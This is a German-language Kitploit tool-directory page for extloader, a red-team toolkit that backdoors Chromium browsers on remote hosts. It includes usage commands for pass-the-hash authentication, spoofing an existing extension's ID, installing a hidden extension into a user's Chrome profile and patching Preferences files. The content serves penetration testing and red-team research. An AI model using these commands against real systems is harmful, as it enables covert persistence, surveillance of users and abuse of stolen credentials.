Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
extloader — Ein Exploitation-Toolkit für Chromium-Erweiterungen | Kitploit
Tools/GitHubGitHub/synacktiv/extloader
PersistenzmechanismenExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationPenetrationstestsRed Teaming
GitHubsynacktiv/extloader

extloader

Ein Exploitation-Toolkit für Chromium-Erweiterungen

Repository anzeigen
262vor 10 MonatenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

extLoader

Ein kleines Toolkit zum Verwalten und Bereitstellen von entpackten Chromium-Erweiterungen.

Mehr dazu im folgenden Blogbeitrag: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways

Installation

Direkte Installation (pipx)

root@kitploit:~
pipx install .
extloader --help

Verwenden Sie pipx für eine isolierte Installation, die auf Python 3.10+ abzielt.

Entwicklungseinrichtung (uv)

root@kitploit:~
uv venv
source .venv/bin/activate
uv pip install -e .

Authentifizierungsoptionen

  • Passwort: -p/--password
  • Hash: -H/--hash (LM:NT-Format oder nur NT)
  • Domäne: -d/--domain (Standard: WORKGROUP)

Allgemeine Parameter

  • -t, --target: Ziel-IP/-Hostname
  • -u, --username: Benutzername
  • -i, --index: Benutzerindex aus dem check-Befehl
  • --debug: Debug-Logging aktivieren

Verwendung

Hier ist ein Schritt-für-Schritt-Beispiel für die Bereitstellung einer Erweiterung:

  1. Zuerst verfügbare Ziele prüfen:
root@kitploit:~
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local

┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index  ┃ Browser         ┃ User (SID)                                                   ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│   1    │ Chrome          │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
│   2    │ Microsoft Edge  │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122)    │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘

Wenn Sie den Exploit auf einer anderen Maschine ausführen, führen Sie immer zuerst den Befehl check aus, um den Kontext (available_targets.json) zu aktualisieren.

  1. Manifest vorbereiten (Signieren oder Spoofing einer ID):
root@kitploit:~
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension

Um eine vorhandene Erweiterungs-ID zu spoofen, überspringen Sie den obigen Befehl und setzen Sie den key im Manifest auf den Base64-öffentlichen Schlüssel der Erweiterung, die Sie nachahmen. Die Wiederverwendung dieses Schlüssels lässt die CRX-ID unverändert.

  1. Bereitstellen der Erweiterung:
root@kitploit:~
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
  1. (Alternative) Für manuelle Bereitstellung paketieren:
root@kitploit:~
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"

# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions

--prefs-file erwartet die Browserprofil-Präferenzen, die Sie gesichert haben (Chrome/Edge speichern sie als Secure Preferences, andere Chromium-Browser verwenden Preferences). Der Loader kopiert sie, patcht sie und fügt sowohl die modifizierte als auch die unveränderte Version in das Paket ein.

root@kitploit:~
├── extension/
│   └── chrome-mv3/
├── preferences/
│   ├── brave/
│   ├── chrome/
│   ├── chromium/
    [...]
└── info.json
  1. Original-Präferenzen bei Bedarf wiederherstellen:
root@kitploit:~
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences

TODO

  • Kerberos-Unterstützung
  • nxc-Modul
  • package-Workflow für Linux anpassen
  • package-Workflow für macOS anpassen
Tool herunterladen